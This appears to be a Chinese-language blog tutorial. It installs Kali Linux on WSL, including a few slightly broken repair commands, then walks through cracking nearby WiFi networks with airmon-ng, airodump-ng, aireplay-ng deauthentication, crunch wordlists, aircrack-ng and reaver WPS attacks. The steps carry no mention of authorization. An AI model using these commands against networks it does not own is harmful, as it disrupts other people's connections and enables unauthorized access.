Kali Linux 是基于 Debian 的 Linux 发行版,它预装了许多渗透测试软件,包括 nmap、Wireshark、Aircrack-ng…
开始之前需要准备一个 Kali Linux 系统
安装
1 2 3 4 5
| Installing, this may take a few minutes... WslRegisterDistribution failed with error: 0x80004005 Error: 0x80004005 ??????
Press any key to continue...
|
Windows Subsystem for Linux
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
| wsl --set-default-version 2
dpkg -i kali-archive-keyring_2022.1_all.deb
here is tuna for tsinghua mirros deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
apt-get update -y apt-get upgrade -y
sudo apt install -y kali-linux-large
sudo apt update sudo apt upgrade
sudo apt install kali-win-kex
kex
sudo dpkg-reconfigure locales
wsl --shutdown
wsl --set-version kali-linux 2
here is kali.exe FilePath:C:\Program Files\WindowsApps\KaliLinux..... we can use Everything search for:kali.exe to find it. kali.exe config --default-user root
apt -y install libcrypt1 apt -y —fix-broken install cd /tmp apt -y download libcrypt1 dpkg-deb -x libcrypt1_1%3a4.4.27-1.1_amd64.deb . cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/ apt -y --fix-broken instal
|
扫描
本文是用 Ventoy 直接从 U 盘启动 Live 镜像,默认账户密码为:kali/kali,进入系统以后打开终端进行如下操作:
开启设备监听
1
| sudo airmon-ng start wlan0
|
扫描附近 WiFi
1
| sudo airodump-ng wlan0mon
|
抓包指定 WiFi
1
| sudo airodump-ng --bssid <BSSID> --channel <频道> --write <包名> wlan0mon
|
断开客户端
1
| sudo aireplay-ng --deauth 10 -a <BSSID> -c <客户端 MAC> wlan0mon
|
生成密码字典
1 2 3 4
| sudo crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
sudo crunch 8 8 -t @@,,%%^^ -o password.txt
|
密码猜解
1 2 3
| sudo aircrack-ng -w <密码字典文件> -b <BSSID> <包名-xx.cap>
|
1
| sudo reaver -i wlan0mon -b 00:5C:C2:22:27:CF -vv
|